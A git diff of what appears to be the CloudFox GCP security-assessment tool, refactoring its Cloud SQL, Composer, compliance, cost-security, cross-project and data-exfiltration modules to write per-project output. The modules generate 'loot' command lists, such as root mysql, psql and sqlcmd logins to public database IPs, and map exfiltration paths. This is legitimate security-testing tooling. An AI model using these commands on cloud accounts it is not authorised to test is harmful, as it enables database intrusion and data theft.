if instance.PublicIP != "" { - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "mysql -h %s -u root -p\n", instance.PublicIP, ) } - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "cloud_sql_proxy -instances=%s=tcp:3306\n", connectionInstance, ) case "postgres": if instance.PublicIP != "" { - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "psql -h %s -U postgres\n", instance.PublicIP, ) } - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "cloud_sql_proxy -instances=%s=tcp:5432\n", connectionInstance, ) case "sqlserver": if instance.PublicIP != "" { - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "sqlcmd -S %s -U sqlserver\n", instance.PublicIP, ) } - m.LootMap["cloudsql-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "cloud_sql_proxy -instances=%s=tcp:1433\n", connectionInstance, ) } - m.LootMap["cloudsql-commands"].Contents += "\n" + lootFile.Contents += "\n" } // getDatabaseType returns the database type from version string @@ -250,8 +269,117 @@ func getDatabaseType(version string) string { // Output Generation // ------------------------------ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Single merged table with one row per authorized network - header := []string{ + // Decide between hierarchical and flat output + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +// writeHierarchicalOutput writes output to per-project directories +func (m *CloudSQLModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + + // Build hierarchical output data + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Build project-level outputs + for projectID, instances := range m.ProjectInstances { + body := m.instancesToTableBody(instances) + tables := []internal.TableFile{{ + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }} + + // Collect loot for this project + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + outputData.ProjectLevelData[projectID] = CloudSQLOutput{Table: tables, Loot: lootFiles} + } + + // Create path builder using the module's hierarchy + pathBuilder := m.BuildPathBuilder() + + // Write using hierarchical output + err := internal.HandleHierarchicalOutputSmart( + "gcp", + m.Format, + m.Verbosity, + m.WrapTable, + pathBuilder, + outputData, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// writeFlatOutput writes all output to a single directory (legacy mode) +func (m *CloudSQLModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getTableHeader() + allInstances := m.getAllInstances() + body := m.instancesToTableBody(allInstances) + + // Collect all loot files + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + + tableFiles := []internal.TableFile{{ + Name: globals.GCP_CLOUDSQL_MODULE_NAME, + Header: header, + Body: body, + }} + + output := CloudSQLOutput{ + Table: tableFiles, + Loot: lootFiles, + } + + scopeNames := make([]string, len(m.ProjectIDs)) + for i, id := range m.ProjectIDs { + scopeNames[i] = m.GetProjectName(id) + } + + err := internal.HandleOutputSmart( + "gcp", + m.Format, + m.OutputDirectory, + m.Verbosity, + m.WrapTable, + "project", + m.ProjectIDs, + scopeNames, + m.Account, + output, + ) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// getTableHeader returns the table header for Cloud SQL instances +func (m *CloudSQLModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Name", @@ -271,9 +399,12 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger "CIDR", "Public Access", } +} +// instancesToTableBody converts instances to table body rows +func (m *CloudSQLModule) instancesToTableBody(instances []CloudSQLService.SQLInstanceInfo) [][]string { var body [][]string - for _, instance := range m.Instances { + for _, instance := range instances { // Format encryption type encryptionDisplay := instance.EncryptionType if encryptionDisplay == "" || encryptionDisplay == "Google-managed" { @@ -348,48 +479,5 @@ func (m *CloudSQLModule) writeOutput(ctx context.Context, logger internal.Logger }) } } - - // Collect loot files - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) - } - } - - // Build table files - tableFiles := []internal.TableFile{ - { - Name: globals.GCP_CLOUDSQL_MODULE_NAME, - Header: header, - Body: body, - }, - } - - output := CloudSQLOutput{ - Table: tableFiles, - Loot: lootFiles, - } - - scopeNames := make([]string, len(m.ProjectIDs)) - for i, id := range m.ProjectIDs { - scopeNames[i] = m.GetProjectName(id) - } - - err := internal.HandleOutputSmart( - "gcp", - m.Format, - m.OutputDirectory, - m.Verbosity, - m.WrapTable, - "project", - m.ProjectIDs, - scopeNames, - m.Account, - output, - ) - if err != nil { - logger.ErrorM(fmt.Sprintf("Error writing output: %v", err), globals.GCP_CLOUDSQL_MODULE_NAME) - m.CommandCounter.Error++ - } + return body } diff --git a/gcp/commands/compliancedashboard.go b/gcp/commands/compliancedashboard.go index 587c3052..6991b6ab 100644 --- a/gcp/commands/compliancedashboard.go +++ b/gcp/commands/compliancedashboard.go @@ -1644,6 +1644,14 @@ func (m *ComplianceDashboardModule) addFailureToLoot(failure ComplianceFailure) // Output Generation // ------------------------------ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ComplianceDashboardModule) buildTables() []internal.TableFile { // Sort controls by severity, then control ID sort.Slice(m.Controls, func(i, j int) bool { if m.Controls[i].Status == "FAIL" && m.Controls[j].Status != "FAIL" { @@ -1735,6 +1743,37 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte } } + // Build tables + tables := []internal.TableFile{ + { + Name: "compliance-controls", + Header: controlsHeader, + Body: controlsBody, + }, + } + + // Add failures table if any + if len(failuresBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-failures", + Header: failuresHeader, + Body: failuresBody, + }) + } + + // Add framework summary table + if len(frameworkBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "compliance-summary", + Header: frameworkHeader, + Body: frameworkBody, + }) + } + + return tables +} + +func (m *ComplianceDashboardModule) collectLootFiles() []internal.LootFile { // Add framework summary to loot for _, fw := range m.Frameworks { if fw.TotalControls > 0 { @@ -1763,18 +1802,142 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte lootFiles = append(lootFiles, *loot) } } + return lootFiles +} - // Build tables - tables := []internal.TableFile{ - { +func (m *ComplianceDashboardModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID - prefer project metadata, fall back to hierarchy + orgID := "" + for _, metadata := range m.projectMetadata { + if parent, ok := metadata["parent"]; ok { + if parentStr, ok := parent.(string); ok && strings.HasPrefix(parentStr, "organizations/") { + orgID = strings.TrimPrefix(parentStr, "organizations/") + break + } + } + } + if orgID == "" && m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = ComplianceDashboardOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 { + outputData.ProjectLevelData[projectID] = ComplianceDashboardOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = ComplianceDashboardOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_COMPLIANCEDASHBOARD_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *ComplianceDashboardModule) buildTablesForProject(projectID string) []internal.TableFile { + // Filter controls for this project + var projectControls []ComplianceControl + for _, c := range m.Controls { + if c.ProjectID == projectID || c.ProjectID == "" { + projectControls = append(projectControls, c) + } + } + + // Filter failures for this project + var projectFailures []ComplianceFailure + for _, f := range m.Failures { + if f.ProjectID == projectID { + projectFailures = append(projectFailures, f) + } + } + + // If no project-specific data, return empty + if len(projectControls) == 0 && len(projectFailures) == 0 { + return nil + } + + var tables []internal.TableFile + + // Controls table + if len(projectControls) > 0 { + controlsHeader := []string{ + "Control ID", + "Control Name", + "Framework", + "Severity", + "Status", + "Details", + } + + var controlsBody [][]string + for _, c := range projectControls { + details := c.Details + if details == "" { + details = "-" + } + controlsBody = append(controlsBody, []string{ + c.ControlID, + c.ControlName, + c.Framework, + c.Severity, + c.Status, + details, + }) + } + + tables = append(tables, internal.TableFile{ Name: "compliance-controls", Header: controlsHeader, Body: controlsBody, - }, + }) } - // Add failures table if any - if len(failuresBody) > 0 { + // Failures table + if len(projectFailures) > 0 { + failuresHeader := []string{ + "Control ID", + "Severity", + "Resource", + "Type", + "Project Name", + "Project ID", + "Risk Score", + } + + var failuresBody [][]string + for _, f := range projectFailures { + failuresBody = append(failuresBody, []string{ + f.ControlID, + f.Severity, + f.ResourceName, + f.ResourceType, + m.GetProjectName(f.ProjectID), + f.ProjectID, + fmt.Sprintf("%d", f.RiskScore), + }) + } + tables = append(tables, internal.TableFile{ Name: "compliance-failures", Header: failuresHeader, @@ -1782,14 +1945,12 @@ func (m *ComplianceDashboardModule) writeOutput(ctx context.Context, logger inte }) } - // Add framework summary table - if len(frameworkBody) > 0 { - tables = append(tables, internal.TableFile{ - Name: "compliance-summary", - Header: frameworkHeader, - Body: frameworkBody, - }) - } + return tables +} + +func (m *ComplianceDashboardModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() output := ComplianceDashboardOutput{ Table: tables, diff --git a/gcp/commands/composer.go b/gcp/commands/composer.go index 37305daf..d00d31e7 100644 --- a/gcp/commands/composer.go +++ b/gcp/commands/composer.go @@ -30,9 +30,10 @@ Features: type ComposerModule struct { gcpinternal.BaseGCPModule - Environments []composerservice.EnvironmentInfo - LootMap map[string]*internal.LootFile - mu sync.Mutex + ProjectEnvironments map[string][]composerservice.EnvironmentInfo // projectID -> environments + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + PrivescCache *gcpinternal.PrivescCache // Cached privesc analysis results + mu sync.Mutex } type ComposerOutput struct { @@ -50,18 +51,21 @@ func runGCPComposerCommand(cmd *cobra.Command, args []string) { } module := &ComposerModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - Environments: []composerservice.EnvironmentInfo{}, - LootMap: make(map[string]*internal.LootFile), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectEnvironments: make(map[string][]composerservice.EnvironmentInfo), + LootMap: make(map[string]map[string]*internal.LootFile), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { + // Get privesc cache from context (populated by --with-privesc flag or all-checks) + m.PrivescCache = gcpinternal.GetPrivescCacheFromContext(ctx) + m.RunProjectEnumeration(ctx, logger, m.ProjectIDs, globals.GCP_COMPOSER_MODULE_NAME, m.processProject) - if len(m.Environments) == 0 { + allEnvironments := m.getAllEnvironments() + if len(allEnvironments) == 0 { logger.InfoM("No Composer environments found", globals.GCP_COMPOSER_MODULE_NAME) return } @@ -69,7 +73,7 @@ func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { // Count by state running := 0 publicEnvs := 0 - for _, env := range m.Environments { + for _, env := range allEnvironments { if env.State == "RUNNING" { running++ } @@ -79,10 +83,18 @@ func (m *ComposerModule) Execute(ctx context.Context, logger internal.Logger) { } logger.SuccessM(fmt.Sprintf("Found %d Composer environment(s) (%d running, %d public)", - len(m.Environments), running, publicEnvs), globals.GCP_COMPOSER_MODULE_NAME) + len(allEnvironments), running, publicEnvs), globals.GCP_COMPOSER_MODULE_NAME) m.writeOutput(ctx, logger) } +func (m *ComposerModule) getAllEnvironments() []composerservice.EnvironmentInfo { + var all []composerservice.EnvironmentInfo + for _, envs := range m.ProjectEnvironments { + all = append(all, envs...) + } + return all +} + func (m *ComposerModule) processProject(ctx context.Context, projectID string, logger internal.Logger) { if globals.GCP_VERBOSITY >= globals.GCP_VERBOSE_ERRORS { logger.InfoM(fmt.Sprintf("Enumerating Composer in project: %s", projectID), globals.GCP_COMPOSER_MODULE_NAME) @@ -98,22 +110,29 @@ func (m *ComposerModule) processProject(ctx context.Context, projectID string, l } m.mu.Lock() - m.Environments = append(m.Environments, environments...) + m.ProjectEnvironments[projectID] = environments + + // Initialize loot for this project + if m.LootMap[projectID] == nil { + m.LootMap[projectID] = make(map[string]*internal.LootFile) + m.LootMap[projectID]["composer-commands"] = &internal.LootFile{ + Name: "composer-commands", + Contents: "# Composer Commands\n# Generated by CloudFox\n\n", + } + } + for _, env := range environments { - m.addToLoot(env) + m.addToLoot(projectID, env) } m.mu.Unlock() } -func (m *ComposerModule) initializeLootFiles() { - m.LootMap["composer-commands"] = &internal.LootFile{ - Name: "composer-commands", - Contents: "# Composer Commands\n# Generated by CloudFox\n\n", +func (m *ComposerModule) addToLoot(projectID string, env composerservice.EnvironmentInfo) { + lootFile := m.LootMap[projectID]["composer-commands"] + if lootFile == nil { + return } -} - -func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { - m.LootMap["composer-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# %s (%s)\n"+ "# Project: %s\n", env.Name, env.Location, @@ -121,7 +140,7 @@ func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { ) // gcloud commands - m.LootMap["composer-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gcloud composer environments describe %s --location=%s --project=%s\n"+ "gcloud composer environments run %s --location=%s --project=%s dags list\n", env.Name, env.Location, env.ProjectID, @@ -130,7 +149,7 @@ func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { // DAG bucket command if env.DagGcsPrefix != "" { - m.LootMap["composer-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "gsutil ls %s\n", env.DagGcsPrefix, ) @@ -138,37 +157,58 @@ func (m *ComposerModule) addToLoot(env composerservice.EnvironmentInfo) { // Airflow Web UI if env.AirflowURI != "" { - m.LootMap["composer-commands"].Contents += fmt.Sprintf( + lootFile.Contents += fmt.Sprintf( "# Airflow Web UI: %s\n", env.AirflowURI, ) } - m.LootMap["composer-commands"].Contents += "\n" + lootFile.Contents += "\n" } func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger) { - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *ComposerModule) getTableHeader() []string { + return []string{ "Project Name", "Project ID", "Name", "Location", "State", "Service Account", + "Priv Esc", "Private", "Private Endpoint", "Airflow URI", "DAG Bucket", "Image Version", } +} +func (m *ComposerModule) environmentsToTableBody(environments []composerservice.EnvironmentInfo) [][]string { var body [][]string - for _, env := range m.Environments { + for _, env := range environments { sa := env.ServiceAccount if sa == "" { sa = "(default)" } + // Check privesc for the service account + privEsc := "-" + if m.PrivescCache != nil && m.PrivescCache.IsPopulated() { + if sa != "(default)" && sa != "" { + privEsc = m.PrivescCache.GetPrivescSummary(sa) + } else { + privEsc = "No" + } + } + airflowURI := env.AirflowURI if airflowURI == "" { airflowURI = "-" @@ -191,6 +231,7 @@ func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger env.Location, env.State, sa, + privEsc, boolToYesNo(env.PrivateEnvironment), boolToYesNo(env.EnablePrivateEndpoint), airflowURI, @@ -198,16 +239,53 @@ func (m *ComposerModule) writeOutput(ctx context.Context, logger internal.Logger imageVersion, }) } + return body +} - var lootFiles []internal.LootFile - for _, loot := range m.LootMap { - if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { - lootFiles = append(lootFiles, *loot) +func (m *ComposerModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + for projectID, environments := range m.ProjectEnvironments { + body := m.environmentsToTableBody(environments) + tableFiles := []internal.TableFile{{Name: "composer", Header: m.getTableHeader(), Body: body}} + + var lootFiles []internal.LootFile + if projectLoot, ok := m.LootMap[projectID]; ok { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } } + + outputData.ProjectLevelData[projectID] = ComposerOutput{Table: tableFiles, Loot: lootFiles} } - tables := []internal.TableFile{{Name: "composer", Header: header, Body: body}} + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_COMPOSER_MODULE_NAME) + } +} + +func (m *ComposerModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + allEnvironments := m.getAllEnvironments() + body := m.environmentsToTableBody(allEnvironments) + + var lootFiles []internal.LootFile + for _, projectLoot := range m.LootMap { + for _, loot := range projectLoot { + if loot != nil && loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { + lootFiles = append(lootFiles, *loot) + } + } + } + tables := []internal.TableFile{{Name: "composer", Header: m.getTableHeader(), Body: body}} output := ComposerOutput{Table: tables, Loot: lootFiles} scopeNames := make([]string, len(m.ProjectIDs)) diff --git a/gcp/commands/costsecurity.go b/gcp/commands/costsecurity.go index cbc44526..35ca7b47 100644 --- a/gcp/commands/costsecurity.go +++ b/gcp/commands/costsecurity.go @@ -821,6 +821,14 @@ func (m *CostSecurityModule) initializeLootFiles() { // Output Generation // ------------------------------ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Logger) { + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CostSecurityModule) buildTables() []internal.TableFile { // Main cost-security table (combines cryptomining, orphaned, and anomalies) mainHeader := []string{ "Project ID", @@ -916,16 +924,180 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo }) } - // Collect loot files + // Build tables + var tables []internal.TableFile + + if len(mainBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security", + Header: mainHeader, + Body: mainBody, + }) + } + + if len(expensiveBody) > 0 { + tables = append(tables, internal.TableFile{ + Name: "cost-security-expensive", + Header: expensiveHeader, + Body: expensiveBody, + }) + } + + return tables +} + +func (m *CostSecurityModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Review before executing!\n\n") { lootFiles = append(lootFiles, *loot) } } + return lootFiles +} + +func (m *CostSecurityModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + // Determine org ID from hierarchy + orgID := "" + if m.Hierarchy != nil && len(m.Hierarchy.Organizations) > 0 { + orgID = m.Hierarchy.Organizations[0].ID + } + + if orgID != "" { + // DUAL OUTPUT: Complete aggregated output at org level + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.OrgLevelData[orgID] = CostSecurityOutput{Table: tables, Loot: lootFiles} + + // DUAL OUTPUT: Filtered per-project output + for _, projectID := range m.ProjectIDs { + projectTables := m.buildTablesForProject(projectID) + if len(projectTables) > 0 { + outputData.ProjectLevelData[projectID] = CostSecurityOutput{Table: projectTables, Loot: nil} + } + } + } else if len(m.ProjectIDs) > 0 { + // FALLBACK: No org discovered, output complete data to first project + tables := m.buildTables() + lootFiles := m.collectLootFiles() + outputData.ProjectLevelData[m.ProjectIDs[0]] = CostSecurityOutput{Table: tables, Loot: lootFiles} + } + + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), GCP_COSTSECURITY_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +// buildTablesForProject builds tables filtered to only include data for a specific project +func (m *CostSecurityModule) buildTablesForProject(projectID string) []internal.TableFile { + mainHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Type", + "Location", + "Issue", + "Est. Cost/Mo", + } + + var mainBody [][]string + + // Add cryptomining indicators for this project + for _, c := range m.Cryptomining { + if c.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + c.ProjectID, + m.GetProjectName(c.ProjectID), + c.Name, + c.ResourceType, + c.Location, + fmt.Sprintf("cryptomining: %s", c.Indicator), + "-", + }) + } + + // Add orphaned resources for this project + for _, o := range m.Orphaned { + if o.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + o.ProjectID, + m.GetProjectName(o.ProjectID), + o.Name, + o.ResourceType, + o.Location, + "orphaned", + fmt.Sprintf("$%.2f", o.EstCostMonth), + }) + } + + // Add cost anomalies for this project + for _, a := range m.CostAnomalies { + if a.ProjectID != projectID { + continue + } + mainBody = append(mainBody, []string{ + a.ProjectID, + m.GetProjectName(a.ProjectID), + a.Name, + a.ResourceType, + a.Location, + a.AnomalyType, + fmt.Sprintf("$%.2f", a.EstCostMonth), + }) + } + + // Expensive Resources for this project + expensiveHeader := []string{ + "Project ID", + "Project Name", + "Resource", + "Location", + "Machine Type", + "vCPUs", + "Memory GB", + "GPUs", + "Labeled", + "Est. Cost/Mo", + } + + var expensiveBody [][]string + for _, e := range m.Expensive { + if e.ProjectID != projectID { + continue + } + labeled := "No" + if len(e.Labels) > 0 { + labeled = "Yes" + } + expensiveBody = append(expensiveBody, []string{ + e.ProjectID, + m.GetProjectName(e.ProjectID), + e.Name, + e.Location, + e.MachineType, + fmt.Sprintf("%d", e.VCPUs), + fmt.Sprintf("%.1f", e.MemoryGB), + fmt.Sprintf("%d", e.GPUs), + labeled, + fmt.Sprintf("$%.2f", e.EstCostMonth), + }) + } // Build tables - tables := []internal.TableFile{} + var tables []internal.TableFile if len(mainBody) > 0 { tables = append(tables, internal.TableFile{ @@ -937,12 +1109,19 @@ func (m *CostSecurityModule) writeOutput(ctx context.Context, logger internal.Lo if len(expensiveBody) > 0 { tables = append(tables, internal.TableFile{ - Name: "cost-security-expensive", + Name: "expensive-resources", Header: expensiveHeader, Body: expensiveBody, }) } + return tables +} + +func (m *CostSecurityModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + tables := m.buildTables() + lootFiles := m.collectLootFiles() + output := CostSecurityOutput{ Table: tables, Loot: lootFiles, diff --git a/gcp/commands/crossproject.go b/gcp/commands/crossproject.go index 23278fb8..d240fc48 100644 --- a/gcp/commands/crossproject.go +++ b/gcp/commands/crossproject.go @@ -324,8 +324,15 @@ func (m *CrossProjectModule) addPubSubExportToLoot(export crossprojectservice.Cr // Output Generation // ------------------------------ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Logger) { - // Unified cross-project table with Type column - header := []string{ + if m.Hierarchy != nil && !m.FlatOutput { + m.writeHierarchicalOutput(ctx, logger) + } else { + m.writeFlatOutput(ctx, logger) + } +} + +func (m *CrossProjectModule) getHeader() []string { + return []string{ "Source Project Name", "Source Project ID", "Principal/Resource", @@ -335,7 +342,9 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo "Target Project ID", "External", } +} +func (m *CrossProjectModule) buildTableBody() [][]string { var body [][]string // Add cross-project bindings @@ -431,17 +440,65 @@ func (m *CrossProjectModule) writeOutput(ctx context.Context, logger internal.Lo }) } - // Collect loot files + return body +} + +func (m *CrossProjectModule) collectLootFiles() []internal.LootFile { var lootFiles []internal.LootFile for _, loot := range m.LootMap { if loot.Contents != "" && !strings.HasSuffix(loot.Contents, "# Generated by CloudFox\n\n") { lootFiles = append(lootFiles, *loot) } } + return lootFiles +} + +func (m *CrossProjectModule) writeHierarchicalOutput(ctx context.Context, logger internal.Logger) { + // For crossproject, output at project level since we're looking for entities accessing into each project + outputData := internal.HierarchicalOutputData{ + OrgLevelData: make(map[string]internal.CloudfoxOutput), + ProjectLevelData: make(map[string]internal.CloudfoxOutput), + } + + header := m.getHeader() + body := m.buildTableBody() + lootFiles := m.collectLootFiles() - // Build table files var tables []internal.TableFile + if len(body) > 0 { + tables = append(tables, internal.TableFile{ + Name: "crossproject", + Header: header, + Body: body, + }) + } + + output := CrossProjectOutput{ + Table: tables, + Loot: lootFiles, + } + + // Place at first project level (cross-project analysis spans multiple projects but we need a location) + // Use first project ID as the output location + if len(m.ProjectIDs) > 0 { + outputData.ProjectLevelData[m.ProjectIDs[0]] = output + } + pathBuilder := m.BuildPathBuilder() + + err := internal.HandleHierarchicalOutputSmart("gcp", m.Format, m.Verbosity, m.WrapTable, pathBuilder, outputData) + if err != nil { + logger.ErrorM(fmt.Sprintf("Error writing hierarchical output: %v", err), globals.GCP_CROSSPROJECT_MODULE_NAME) + m.CommandCounter.Error++ + } +} + +func (m *CrossProjectModule) writeFlatOutput(ctx context.Context, logger internal.Logger) { + header := m.getHeader() + body := m.buildTableBody() + lootFiles := m.collectLootFiles() + + var tables []internal.TableFile if len(body) > 0 { tables = append(tables, internal.TableFile{ Name: "crossproject", diff --git a/gcp/commands/dataexfiltration.go b/gcp/commands/dataexfiltration.go index 834e3e58..3e9a06c4 100644 --- a/gcp/commands/dataexfiltration.go +++ b/gcp/commands/dataexfiltration.go @@ -125,13 +125,13 @@ type MissingHardening struct { type DataExfiltrationModule struct { gcpinternal.BaseGCPModule - ExfiltrationPaths []ExfiltrationPath - PotentialVectors []PotentialVector - PublicExports []PublicExport - LootMap map[string]*internal.LootFile - mu sync.Mutex - vpcscProtectedProj map[string]bool // Projects protected by VPC-SC - orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project + ProjectExfiltrationPaths map[string][]ExfiltrationPath // projectID -> paths + ProjectPotentialVectors map[string][]PotentialVector // projectID -> vectors + ProjectPublicExports map[string][]PublicExport // projectID -> exports + LootMap map[string]map[string]*internal.LootFile // projectID -> loot files + mu sync.Mutex + vpcscProtectedProj map[string]bool // Projects protected by VPC-SC + orgPolicyProtection map[string]*OrgPolicyProtection // Org policy protections per project } // ------------------------------ @@ -155,22 +155,45 @@ func runGCPDataExfiltrationCommand(cmd *cobra.Command, args []string) { } module := &DataExfiltrationModule{ - BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), - ExfiltrationPaths: []ExfiltrationPath{}, - PotentialVectors: []PotentialVector{}, - PublicExports: []PublicExport{}, - LootMap: make(map[string]*internal.LootFile), - vpcscProtectedProj: make(map[string]bool), - orgPolicyProtection: make(map[string]*OrgPolicyProtection), + BaseGCPModule: gcpinternal.NewBaseGCPModule(cmdCtx), + ProjectExfiltrationPaths: make(map[string][]ExfiltrationPath), + ProjectPotentialVectors: make(map[string][]PotentialVector), + ProjectPublicExports: make(map[string][]PublicExport), + LootMap: make(map[string]map[string]*internal.LootFile), + vpcscProtectedProj: make(map[string]bool), + orgPolicyProtection: make(map[string]*OrgPolicyProtection), } - module.initializeLootFiles() module.Execute(cmdCtx.Ctx, cmdCtx.Logger) } // ------------------------------ // Module Execution // ------------------------------ +func (m *DataExfiltrationModule) getAllExfiltrationPaths() []ExfiltrationPath { + var all []ExfiltrationPath + for _, paths := range m.ProjectExfiltrationPaths { + all = append(all, paths...) + } + return all +} + +func (m *DataExfiltrationModule) getAllPotentialVectors() []PotentialVector { + var all []PotentialVector + for _, vectors := range m.ProjectPotentialVectors { + all = append(all, vectors...) + } + return all +} + +func (m *DataExfiltrationModule) getAllPublicExports() []PublicExport { + var all []PublicExport + for _, exports := range m.ProjectPublicExports { + all = append(all, exports...) + } + return all +} + func (m *DataExfiltrationModule) Execute(ctx context.Context, logger internal.Logger) { logger.InfoM("Identifying data exfiltration paths and potential vectors...", 